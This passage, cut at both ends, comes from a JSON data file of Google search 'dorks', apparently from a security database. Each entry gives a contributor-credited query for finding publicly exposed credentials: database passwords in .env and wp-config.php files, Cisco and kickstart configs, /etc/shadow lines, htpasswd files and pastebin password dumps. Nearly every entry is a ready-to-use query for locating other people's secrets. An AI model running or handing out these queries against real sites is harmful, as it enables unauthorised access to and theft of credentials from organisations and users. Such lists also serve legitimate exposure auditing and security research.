:\r\nintitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow\r\n\r\nAuthor :\r\nVipin Joshi (@vocuzi)"}, {"dork": "intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow", "description": "Description :\r\nDjango Web Framework TLS using email configs containing login credentials\r\nin Plain Text\r\n\r\nDork :\r\nintitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner", "description": "Description :\r\nPlain text wordpress config responses, exposing DB passwords\r\n\r\nDork:\r\ninurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner\r\n\r\nAuthor:\r\nVipin Joshi(@vocuzi)"}, {"dork": "inurl:login.txt filetype:txt", "description": "I used this dork while doing some botnet research. All sorts of interesting\r\nfiles pertaining to usernames/passwords for various C&C servers, devices,\r\netc.\r\n\r\ninurl:login.txt filetype:txt"}, {"dork": "s3 site:amazonaws.com filetype:xls password", "description": "excel files containing user id and password information stored on AWS S3\r\nbuckets\r\n\r\n*Google Dork*\r\n\r\ns3 site:amazonaws.com filetype:xls password\r\n\r\n*Dates: *22-05-2019\r\n\r\n*Dork Author:* acc3ssp0int\r\n\r\n*Tested on:* any OS with a functioning browser running Google.com"}, {"dork": "intext:\"wordpress\" filetype:xls login & password", "description": "Excel files containing the user names and passwords.\r\n\r\nGoogle Dork: *intext:\"wordpress\" filetype:xls login & password*\r\n\r\nAuthor: Prasad Borvankar."}, {"dork": "inurl:users.json + \"username\"", "description": "inurl:users.json + \"username\"\r\n\r\nFile contain usernames and passwords\r\n\r\nManhNho"}, {"dork": "intext:\"aspx\" filetype:txt login & password", "description": "# Exploit Title: text files containing the user names and passwords.\r\n\r\n# Google Dork: intext:\"aspx\" filetype:txt login & password\r\n\r\n# Author: ahmed mohammed adel - from egypt\r\n\r\n@hmed@del"}, {"dork": "\"pass\" \"usuario\" filetype:sql", "description": "Leak user and password (hashed) in sql files\r\n\r\n\"usuario\" \"clave\" filetype:sql\r\n\"usuario\" \"pass\" filetype:sql\r\n\"usuario\" \"pwd\" filetype:sql\r\n\"pass\" \"correo\" filetype:sql -github.com"}, {"dork": "intitle:\"index of\" \"htpasswd.txt\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"htpasswd.txt\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"ftp.passwd\"", "description": "files containing password:\r\n\r\nintitle:\"index of\" \"ftp.passwd\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"@gmail.com\" intext:\"password\" inurl:/files/ ext:txt", "description": "files containing email and password:\r\n\r\nintext:\"@gmail.com\" intext:\"password\" inurl:/files/ ext:txt\r\next:txt intext:\"@gmail.com\" intext:\"password\"\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "\"contrasena\" filetype:sql -github.com", "description": "Google Dork: \"contrasena\" filetype:sql -github.com\r\nDate: 09/14/2019\r\nExploit Author: th3d3xt3r\r\nCategory: Files containing passwords"}, {"dork": "intitle:\"Index of\" password.txt", "description": "Dork:\r\nintitle:\"Index of\" password.txt\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains password clear text sensitive information."}, {"dork": "intitle:\"index of\" \"db.conf\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"db.conf\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" share.passwd OR cloud.passwd OR ftp.passwd -public", "description": "Dorks containing passwords.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:index.of \"creds.txt\"", "description": "Dork:\r\nintitle:index.of \"creds.txt\"\r\n\r\nDescription:\r\nThis dork queries google to find publicly available credential files.\r\n\r\nCategory:\r\nFiles Containing Juicy Info."}, {"dork": "intext:\"username=\" AND \"password=\" ext:log", "description": "Log files containing credentials"}, {"dork": "intext:\"WPENGINE_SESSION_DB_USERNAME\" || \"WPENGINE_SESSION_DB_PASSWORD\"", "description": "WPEngine credentials exposed\r\n\r\n-- \r\n\r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"passwords.yml\"", "description": "# Google Dork: intitle:\"index of\" \"passwords.yml\"\r\n\r\n# By using this dork, usernames and passwords can be found.\r\n\r\n# Date: 18/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.yml\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.yml\"\r\n\r\n# By using this dork, files containing encrypted credentials can be found.\r\n\r\n# Date: 18/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"enable password\" ext:cfg -git -cisco.com", "description": "# Google Dork: \r\n\"enable password\" ext:cfg -git -cisco.com\r\npassword aux-password ext:cfg -git -cisco.com\r\npassword vty-password ext:cfg -git -cisco.com\r\nservice password-encryption ext:cfg -git -cisco.com\r\nintext:\"set enablepass password\"\r\n\"set enablepass password\" ext:txt\r\nintext:\"password encrypted\" filetype:txt\r\n\"password encrypted\" ext:cfg\r\n\r\n# By using this dork, passwords in Cisco configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "password console-password ext:cfg -git", "description": "# Google Dork: password console-password ext:cfg -git\r\n\r\n# By using this dork, passwords in configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:authentication set encrypted-password ext:cfg", "description": "# Google Dork: intext:authentication set encrypted-password ext:cfg\r\n\r\n# By using this dork, passwords in configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" dbconnect.inc", "description": "# Google Dork: intitle:\"Index of\" dbconnect.inc\r\n\r\n# By using this dork, the dbconnect.inc file which contains the\r\npassword for the database administrator in clear text .. can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"create account\" admin ext:cfg", "description": "# Google Dork: \"create account\" admin ext:cfg\r\n\r\n# By using this dork, admin passwords in configuration files can be found.\r\n\r\n# Date: 21/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"configure account user encrypted\" ext:cfg", "description": "# Google Dork: \"configure account user encrypted\" ext:cfg\r\n\tintext:\"configure account user encrypted\"\r\n\tintext:\"configure account admin encrypted\"\r\n \"configure account admin encrypted\" ext:cfg\r\n\r\n# By using this dork, user passwords in configuration files can be found.\r\n\r\n# Date: 21/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"d-i passwd/root-password-crypted password\" ext:cfg", "description": "# Google Dork: \r\n\"d-i passwd/root-password-crypted password\" ext:cfg\r\n\"d-i passwd/user-password-crypted\" ext:cfg\r\nintext:\"d-i network-console/password\"\r\n\r\n# By using this dork, usernames and passwords in configuration files can be\r\nfound.\r\n\r\n# Date: 23/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.connection.js\"", "description": "#Google Dork: intitle:\"index of\" \"db.connection.js\"\r\n\r\n# By using this dork, some database passwords can be found.\r\n\r\n# Date: 27/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" application.ini", "description": "# Google Dork: intitle:\"index of\" application.ini\r\n\r\n# Applications' configuration files containing usernames and passwords.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"database.ini\" OR \"database.ini.old\"", "description": "# Google Dork: intitle:\"index of\" \"database.ini\" OR \"database.ini.old\"\r\n\r\n# Configuration files containing database usernames and passwords.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"admin password irreversible-cipher\" ext:txt OR ext:log OR ext:cfg", "description": "# Google Dork: \"admin password irreversible-cipher\" ext:txt OR ext:log OR\r\next:cfg\r\n\r\n# Configuration files containing usernames and passwords.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"super password level 3 cipher\" ext:txt OR ext:log", "description": "# Google Dork: \"super password level 3 cipher\" ext:txt OR ext:log\r\n\r\n# Configuration files containing usernames and passwords.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.ini\"", "description": "# Google Dork: intitle:\"index of\" \"db.ini\"\r\n\r\n# Configuration files containing database usernames and passwords.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of \" \"*.passwords.txt\"", "description": "#Description : \r\nintitle:\"index of \" \"*.passwords.txt\"\r\nintitle:\"index of\" inurl:passwords\r\nintitle:\"index of /\" \"credentials.zip\"\r\nintitle:\"index of /\" \"passwords.zip\"\r\nintitle:\"index of /\" \"tokens.zip\"\r\n\r\nFile containing username and passwords\r\nAuthor : Vaibhav Lakhani\r\nDate : 22 April 2020\r\n\r\n*Screenshot :*\r\n\r\n[image: image.png]\r\n\r\n-- \r\nRegards,\r\nVaibhav Lakhani"}, {"dork": "\"MasterUserPassword\" ext:cfg OR ext:log OR ext:txt -git", "description": "# Google Dork: \"MasterUserPassword\" ext:cfg OR ext:log OR ext:txt -git\r\n\r\n# By using this dork some exposed master user passwords can be found.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"/etc/shadow root:$\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git", "description": "# Google Dork: \"/etc/shadow root:$\" ext:cfg OR ext:log OR ext:txt OR\r\next:sql -git\r\n\r\n# By using this dork some root passwords in /etc/shadow can be found.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:*helpdesk* intext:\"your default password is\"", "description": "Author: MiningOmerta\r\nInformation: Finds default passwords in some pleace that may have not been seen before\r\n\r\nDork:\r\n\r\ninurl:*helpdesk* intext:\"your default password is\""}, {"dork": "intitle:\"index of\" \"passwords.xlsx\"", "description": "Dork: intitle:\"index of\" \"passwords.xlsx\"\r\nDescription: This Google dork lists out sensitive passwords stored in a\r\nexcel file for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"config.neon\" OR \"config.local.neon\"", "description": "# Google Dork: intitle:\"index of\" \"config.neon\" OR \"config.local.neon\"\r\n\r\n# Juicy information, sensitive directories including db usernames and passwords.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Index of /password\"", "description": "Dork: intext:\"Index of /password\"\r\nDescription: This google dorks lists out password folders on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"config.php.bak\" intitle:\"index of\"", "description": "# Dork: \"config.php.bak\" intitle:\"index of\"\r\n# Date: 2020-06-02\r\n# Exploit Author: M.Harsha vardhan\r\n#Description : This dorks leaks the db user_pass from backup files of database/phpmyadmin"}, {"dork": "\"index of\" \".env\"", "description": "# Title: Sensitive file disclosure containing passwords.\r\n# Google Dork: \"index of\" \".env\"\r\n# Date: 04/06/2020\r\n# Author: Ritik Sahni"}, {"dork": "filetype:env \"DB_PASSWORD\"", "description": "# Dork : filetype:env \"DB_PASSWORD\"\r\n# This Dork reveals the .env files that contain Strings about Database Passwords, Hence revealing the passwords to the database found.\r\n# Author : Shivanshu Sharma"}, {"dork": "\"MYSQL_ROOT_PASSWORD:\" ext:env OR ext:yml -git", "description": "# Google Dork: \"MYSQL_ROOT_PASSWORD:\" ext:env OR ext:yml -git\r\n# Juicy information and sensitive directories including user names and passwords.\r\n# Date: 18/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/master.passwd\"", "description": "# Google Dork: intitle:\"index of\" \"/master.passwd\"\r\n# Date: 30/06/2020\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:logs intext:GET https:// ext:txt intext:password intext:username", "description": "Dork: inurl:logs intext:GET https:// ext:txt intext:password intext:username\r\nDescription: this dork will return username and password sent in GET\r\nrequest from proxies logs.\r\nAuthor: Sandeep kumar"}, {"dork": "allintext:password filetype:log", "description": "Dork:allintext:password filetype:log\r\nDescription:contains information related to password type website and log\r\nAuthor:Mohd Asif Khan"}, {"dork": "\"Index of\" \"/yahoo_site_admin/credentials\"", "description": "Google Dork: \"Index of\" \"/yahoo_site_admin/credentials\"\r\nTitle: File containing passwords\r\nDate: 01/07/2020\r\nAuthor : Mohit Khemchandani"}, {"dork": "intext:\"db_database\" ext:env intext:\"db_password\"", "description": "# Google Dork: intext:\"db_database\" ext:env intext:\"db_password\"\r\n# Exposed database credentials (username and password).\r\n# Date: 23/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:\"redis_password\" ext:env", "description": "# Google Dork: allintext:\"redis_password\" ext:env\r\n# Exposed Redis Passwords found in .env files.\r\n# Date: 05/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"EMAIL_HOST_PASSWORD\" ext:yml | ext:env | ext:txt | ext:log", "description": "# Google Dork: \"EMAIL_HOST_PASSWORD\" ext:yml | ext:env | ext:txt | ext:log\r\n# Exposed passwords.\r\n# Date: 14/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"/** MySQL database password */\" ext:txt | ext:cfg | ext:env | ext:ini", "description": "# Google Dork: \"/** MySQL database password */\" ext:txt | ext:cfg | ext:env\r\n| ext:ini\r\n\r\n# MySQL database usernames and passwords.\r\n\r\n# Date: 1/09/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"POSTGRES_PASSWORD=\" ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab", "description": "# Google Dork: \"POSTGRES_PASSWORD=\" ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab\r\n# Exposed passwords.\r\n# Date: 15/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:xls intext:@gmail.com intext:password", "description": "Dork: ext:xls intext:@gmail.com intext: password\r\nIt will return the spreadsheets(xls) that contains some email and passwords\r\nwhich can be exploited by anyone."}, {"dork": "intitle:\"database.php\" inurl:\"database.php\" intext:\"db_password\" -git -gitlab", "description": "# Google Dork: intitle:\"database.php\" inurl:\"database.php\" intext:\"db_password\" -git -gitlab\r\n# Exposed database usernames and passwords.\r\n# Date: 22/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:txt intext:@yahoo.com intext:password", "description": "# Google Dork: ext:txt intext:@yahoo.com intext:password\r\n# By using this dorks,It will return the text file that contains some email\r\nand passwords which can be exploited by anyone.\r\n# Date: 22/09/2020\r\n# Author: Dharmveer Singh"}, {"dork": "\"'username' =>\" + \"'password' =>\" ext:log", "description": "# Google Dork: \"'username' =>\" + \"'password' =>\" ext:log\r\n# Exposed passwords, and much more...\r\n# Date: 22/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com", "description": "Category: Log Files Containing Latest Passwords\r\n\r\nYours Sincerely,\r\nAnurodh Acharya"}, {"dork": "\"index of\" \"password.ini\"", "description": "# Google Dork: \"index of\" \"password.ini\"\r\n# Description :- Dork shows configuration files for password.\r\n# Date: 23/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "\"admin_password\" ext:txt | ext:log | ext:cfg", "description": "# Google Dork: \"admin_password\" ext:txt | ext:log | ext:cfg\r\n# Admin passwords.\r\n# Date: 29/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "rootpw --iscrypted ext:cfg", "description": "# Google Dork: rootpw --iscrypted ext:cfg\r\n\r\n# Exposed passwords.\r\n\r\n# Date: 5/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"anaconda-ks.cfg\" | \"ks.cfg\" ext:cfg -git -gitlab", "description": "# Google Dork: \"anaconda-ks.cfg\" | \"ks.cfg\" ext:cfg -git -gitlab\r\n\r\n# Sensitive directories containing passwords.\r\n\r\n# Date: 6/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"server.cfg\" ext:cfg intext:\"rcon_password\" -git -gitlab", "description": "# Google Dork: \"server.cfg\" ext:cfg intext:\"rcon_password\" -git -gitlab\r\n\r\n# Exposed passwords found in server.cfg files.\r\n\r\n# Date: 7/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:cfg \"g_password\" | \"sv_privatepassword\" | \"rcon_password\" -git -gitlab", "description": "# Google Dork: ext:cfg \"g_password\" | \"sv_privatepassword\" | \"rcon_password\" -git -gitlab\r\n\r\n# Exposed passwords found in .cfg files.\r\n\r\n# Date: 8/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"db.username\" + \"db.password\" ext:properties", "description": "# Google Dork: \"db.username\" + \"db.password\" ext:properties\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 13/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:pastebin.com intext:admin.password", "description": "Name: Paramjot Singh\r\nCategory: Files Containing Passwords\r\nDescription: This dork helps in finding dumped admin:password combos.\r\n\r\nAttached Images can be found below:"}, {"dork": "ext:log password END_FILE", "description": "Dear Team,\r\n\r\n# Exploit Title: *ext:log password END_FILE*\r\n# Google Dork: *ext:log password END_FILE*\r\n# Juicy Information : Java password files\r\n# Date: 18/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\nThanks & Regards\r\nSajan Dhakate"}, {"dork": "\"spring.datasource.password=\" + \"spring.datasource.username=\" ext:properties -git -gitlab", "description": "# Google Dork: \"spring.datasource.password=\" +\r\n\"spring.datasource.username=\" ext:properties -git -gitlab\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 11/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab", "description": "# Google Dork : jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab\r\n\r\n# Description : Exposed usernames and passwords.\r\n\r\n# Date: 22/10/2020\r\n\r\n# Author: Jose Praveen"}, {"dork": "jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab", "description": "# Google Dork: jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab\r\n# Exposed usernames and passwords.\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab", "description": "# Google Dork: jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab\r\n# Exposed usernames and passwords.\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"config.exs\" | \"dev.exs\" | \"test.exs\" | \"prod.secret.exs\"", "description": "# Google Dork: intitle:\"index of\" \"config.exs\" | \"dev.exs\" | \"test.exs\" | \"prod.secret.exs\"\r\n# Sensitive directories containing many times usernames and passwords.\r\n# Date: 12/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"define('DB_USER',\" + \"define('DB_PASSWORD',\" ext:txt", "description": "# Google Dork: \"define('DB_USER',\" + \"define('DB_PASSWORD',\" ext:txt\r\n# Sensitive directories containing Database usernames and passwords.\r\n# Date: 18/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"anaconda-ks.cfg\" | \"anaconda-ks-new.cfg\"", "description": "# Google Dork: intitle:\"index of\" \"anaconda-ks.cfg\" | \"anaconda-ks-new.cfg\"\r\n\r\n# Files containing passwords.\r\n\r\n# Date: 20/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"define('SECURE_AUTH_KEY'\" + \"define('LOGGED_IN_KEY'\" + \"define('NONCE_KEY'\" ext:txt | ext:cfg | ext:env | ext:ini", "description": "# Google Dork: \"define('SECURE_AUTH_KEY'\" + \"define('LOGGED_IN_KEY'\" + \"define('NONCE_KEY'\" ext:txt | ext:cfg | ext:env | ext:ini\r\n# Files containing passwords, keys, and more...\r\n# Date: 25/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"keystorePass=\" ext:xml | ext:txt -git -gitlab", "description": "# Google Dork: \"keystorePass=\" ext:xml | ext:txt -git -gitlab\r\n\r\n# Files containing passwords.\r\n\r\n# Date: 27/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:construct('mysql:host", "description": "# Google Dork: intext:construct('mysql:host\r\n# Date: 12/1/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nFiles containing passwords\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "\"mailer_password:\" + \"mailer_host:\" + \"mailer_user:\" + \"secret:\" ext:yml", "description": "# Google Dork: \"mailer_password:\" + \"mailer_host:\" + \"mailer_user:\" + \"secret:\" ext:yml\r\n# Files containing email username and password and more...\r\n# Date: 10/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"idx_config\"", "description": "# Google Dork: intitle:\"index of\" \"idx_config\"\r\n\r\n# Files containing usernames, passwords and much more...\r\n\r\n# Date: 11/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"password 7\" ext:txt | ext:log | ext:cfg", "description": "# Google Dork: \"password 7\" ext:txt | ext:log | ext:cfg\r\n# Files containing passwords.\r\n# Date: 21/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"insert into users\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork: \"insert into users\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env\r\n\r\n# Sensitive directories containing usernames, passwords and more...\r\n\r\n# Date: 21/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"cpanel username\" \"cpanel password\" ext:txt", "description": "Dork: \"cpanel username\" \"cpanel password\" ext:txt\r\nAuthor:"}, {"dork": "intitle:\"index of\" \"application-users.properties\" | \"mgmt-users.properties\" | \"*standalone.xml\"", "description": "# Google Dork: intitle:\"index of\" \"application-users.properties\" | \"mgmt-users.properties\" | \"*standalone.xml\"\r\n\r\n# Files containing usernames and passwords in some cases...\r\n\r\n# Date: 23/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"public $user =\" | \"public $password = \" | \"public $secret =\" | \"public $db =\" ext:txt | ext:log -git", "description": "# Google Dork: \"public $user =\" | \"public $password = \" | \"public $secret =\" | \"public $db =\" ext:txt | ext:log -git\r\n\r\n# Files containing usernames and passwords and more...\r\n\r\n# Date: 23/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)", "description": "#Dork: site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)"}, {"dork": "\"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd", "description": "# Dork: \"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd\r\n\r\nThankyou,\r\nParth Patel."}, {"dork": "inurl:/wp-content/uploads/ ext:txt \"username\" AND \"password\" | \"pwd\" | \"pw\"", "description": "# Dork: inurl:/wp-content/uploads/ ext:txt \"username\" AND \"password\" | \"pwd\" | \"pw\""}, {"dork": "allintext:\"*.@gmail.com\" OR \"password\" OR \"username\" filetype:xlsx", "description": "# DORK: allintext:\"*.@gmail.com\" OR \"password\" OR \"username\" filetype:xlsx"}, {"dork": "inurl:/wp-content/uploads/data.txt", "description": "# Google Dork: inurl:/wp-content/uploads/data.txt\r\n\r\n# Files Containing Passwords\r\n\r\n# Date: 22/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "site:pastebin.com intitle:\"password\" 2021", "description": "# Google Dork: site:pastebin.com intitle:\"password\" 2021\r\n# Files Containing Passwords\r\n# Date: 24/08/2021 \r\n# Exploit Author: Deepak Kumar"}, {"dork": "filetype:log username admin", "description": "# Google Dork: filetype:log username admin\r\n# Files Containing Passwords\r\n# Date: 09/009/2021 \r\n# Exploit Author: Rohit Singh"}, {"dork": "\"enable secret 5\" ext:txt | ext:cfg", "description": "# Google Dork: \"enable secret 5\" ext:txt | ext:cfg\r\n# Files Containing Passwords.\r\n# Date: 8/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-config.php.save", "description": "# Google Dork: inurl:wp-config.php.save\r\n# Files Containing Passwords\r\n# Date: 02/08/2021 \r\n# Exploit Author: Mohsin Khan"}, {"dork": "Inurl: \"login\" Intitle:index of username and pass", "description": "# Google Dork: Inurl: \"login\" Intitle:index of username and pass\r\n# Files Containing Passwords\r\n# Date: 22/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "intitle: \"Index of ftp passwords\"", "description": "# Google Dork: intitle: \"Index of ftp passwords\"\r\n# Files Containing Passwords\r\n# Date:12/09/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "\"index of /\" +passwd", "description": "# Google Dork: \"index of /\" +passwd\r\n# Files Containing Passwords\r\n# Date:24/09/2021\r\n# Exploit Author: Sugavanam D"}, {"dork": "allintext:password filetype:log after:2018", "description": "# Google Dork: allintext:password filetype:log after:2018\r\n# Files Containing Passwords\r\n# Date:26/09/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"index of\" \"credentials\"", "description": "# Google Dork: intitle:\"index of\" \"credentials\"\r\n# Files Containing Passwords\r\n# Date:12/10/2021\r\n# Exploit Author: Darkgen"}, {"dork": "intitle:\"index of\" \"passwrod*\"", "description": "# Google Dork: intitle:\"index of\" \"password*\"\r\n# Files Containing Passwords\r\n# Date:22/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "inurl:password site:shodan.io", "description": "# Google Dork: inurl:password site:shodan.io\r\n# Files Containing Passwords\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "site:pastebin.com intext:username | password | SECRET_KEY", "description": "# Google Dork: site:pastebin.com intext:username | password | SECRET_KEY\r\n# Files Containing Passwords\r\n# Date:29/10/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "inurl:/wp-content/uploads/ ext:txt \"username\" | \"user name\" | \"uname\" | \"user\" | \"userid\" | \"user id\" AND \"password\" | \"pass word\" | \"pwd\" | \"pw\"", "description": "# Google Dork: inurl:/wp-content/uploads/ ext:txt \"username\" | \u201cuser name\u201d | \u201cuname\u201d | \u201cuser\u201d | \u201cuserid\u201d | \u201cuser id\u201d AND \"password\" | \u201cpass word\u201d | \"pwd\" | \"pw\"\r\n# Files Containing Passwords\r\n# Date:29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intext:\"/pfx-password.txt\" \"[To Parent Directory]\"", "description": "# Google Dork: intext:\"/pfx-password.txt\" \"[To Parent Directory]\"\r\n# Files Containing Passwords\r\n# Date:31/10/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"index of\" \"uploads\"", "description": "# Google Dork: intext:\"index of\" \"uploads\"\r\n# Files containing juicy information\r\n# Date: 05/11/2021\r\n# Author: Onkar Deshmukh"}, {"dork": "intext:\"password\" | \"passwd\" | \"pwd\" site:ghostbin.com", "description": "# Google Dork: intext:\"password\" | \"passwd\" | \"pwd\" site:ghostbin.com\r\n# Files Containing Passwords\r\n# Date:5/11/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "site:pastebin.com intext:password.txt", "description": "# Google Dork: site:pastebin.com intext:password.txt\r\n# Files Containing Passwords\r\n# Date:5/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"Index of\" intext:\"password.zip\"", "description": "# Google Dork: intext:\"Index of\" intext:\"password.zip\"\r\n# Files Containing Passwords\r\n# Date:8/11/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "site:pastebin.com intext:pass.txt", "description": "# Google Dork: site:pastebin.com intext:pass.txt\r\n# Files Containing Passwords\r\n# Date: 08/11/2021 \r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:pastebin.com \"password\"", "description": "# Google Dork: site:pastebin.com \"password\"\r\n# Files Containing Passwords\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:pastebin.com \"admin password\"", "description": "# Google Dork: site:pastebin.com \"admin password\"\r\n# Files Containing Passwords\r\n# Date:15/11/2021\r\n# Exploit Author: Saumyajeet Das"}, {"dork": "site:controlc.com intext:\"password\"", "description": "# Google Dork: site:controlc.com intext:\"password\"\r\n# Files Containing Passwords\r\n# Date:15/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:rentry.co intext:\"password\"", "description": "# Google Dork: site:rentry.co intext:\"password\"\r\n# Files Containing Passwords\r\n# Date:15/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intitle:\"Index of\" htpasswd", "description": "# Google Dork: intitle:\"Index of\u201d htpasswd\r\n# Files Containing Passwords\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" pwd.db", "description": "# Google Dork: intitle:\"Index of\u201d pwd.db\r\n# Files Containing Passwords\r\n# Date: 